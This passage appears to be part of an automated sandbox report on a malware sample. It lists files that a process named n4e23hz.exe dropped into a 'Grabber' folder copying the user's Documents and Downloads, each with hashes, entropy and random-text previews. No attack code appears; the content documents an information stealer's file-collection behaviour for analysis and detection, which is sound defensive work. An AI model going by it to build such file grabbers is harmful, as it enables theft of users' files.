Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BPMLNOBVSB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702896917219035
Encrypted:	false
SSDEEP:	24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
MD5:	C68274AA8B7F713157BEBE2FCC2EA5D3
SHA1:	52A5A2D615A813B518DDAAC2A02095F1059DAAD5
SHA-256:	362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
SHA-512:	BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
Malicious:	false
Preview:	BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DVWHKMNFNN.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\HTAGVDFUIE.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\JSDNGYCOWY.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690895772725941
Encrypted:	false
SSDEEP:	24:ZTWQe0oC6OG/K8Vsypd0HuXw0xVfU/Vzv98UU:ZTWQr2VyXysHIwcGKUU
MD5:	A002E80B55673139253599B753BDC01A
SHA1:	6AEEF831A5AAB9155AAABB52D173859E20A86932
SHA-256:	F3484FA4E615D7134AC1BF4C3355C6AD63B32AC3CD096345C5EBF6B0CE6669A0
SHA-512:	D4A9257255BA4610E904C005F6734E65D5B0B4489E645792F3AB52AFD59B4B76E4B0FCE1F3457D7E5D3DA3101DAAC80A926FA513B77DAB01F2DAC5F5C4304CA7
Malicious:	false
Preview:	JSDNGYCOWYHKSOWFGCIERRTFYJMLBLSAMTEZRBUWFRXYICIUHZNIMVLJXTFXQNXACRFWSEWJBERQHLEBPYXRECCWDJKIIOUGNYQMGAHSLOPLLALAEDDKJTOOCDGYIBOWZZREIEWSXQRGULZIXFYNIUMNTNALWVABHVLKEJLBKGOKXZWDSWRTTLTQLNTZDYMSECYMQISNCNIAJOWDCCMHWLIVFACQKZXXZJOSENBJHZELIVOCAHDNZGZILFSILTSAJXDBFAIPHVHXYHJHVMVHKVOMYOGGVIKVJUVYLDFTICBCZKSVRDRTALSXFNMCPLGOGSEBKXSHSHVDVDKWEHNIBLPTMWICAACVFWPQNIUVLFSAWPOGDJFOGTXDHMTFWREVZXCABJCKFYXJGAHKTXNFLIILTMBRTKACTMOVDBLCVYDVLNCDXAAINTGCCRZPDTOFCWZWTHLCVGRTQPEBHUFYWLTLNUIOFLOUTCINZEJUVLTZPPDBVDEELCGFQSGJPRJBEALQLZQAYAQRUTUANCYUZJENWEIISDNULLJXJUPBQHEJEUVMKMEUQRDHXPAZVIFDUGNWXKXYWIQQNJNRMYCLJLHWESVCNCQSXILKRQFSYEDZSBHSLAYIWWOVRVVSWUFEAQPMAPAKFCXFBDIPKHPSFGVOJCEEBALPVQKECBBUCTQGQXOQAPOOYAPYQXNDLKJDRFQDILPIWRGDYTFUHSZLJICMMUSSHGHNLKNEDYXJSPECVTAEQTVXATOODAVROWNAPCHDRRBHVDVWBGOSCJGDENAGFCYDIHAPBWLJNOPCQCPTSOHGQQMHEAKRBOBSEHAOMGXJVYWJGLSIQJUOMYPNZTOFVNNMRIVMHOCFZTLTEDAGEXGJXLNRLSHJQGFHIJDLJHOPPMFPYEIXPRQCTRDIYDJEHHSKFBRZMXLZJBDDOYCXQJBCBQFRXVCYCHXKGNDWEEUUKPAGVHHOXFZXZEWWCOVSFYZHILZJQQKFHCLR

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\b0c5328e33fe022b59109715a4f0ce83\user@855271_en-CH\Grabber\DRIVE-C\Users\user\Downloads\NWTVCDUMOB.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
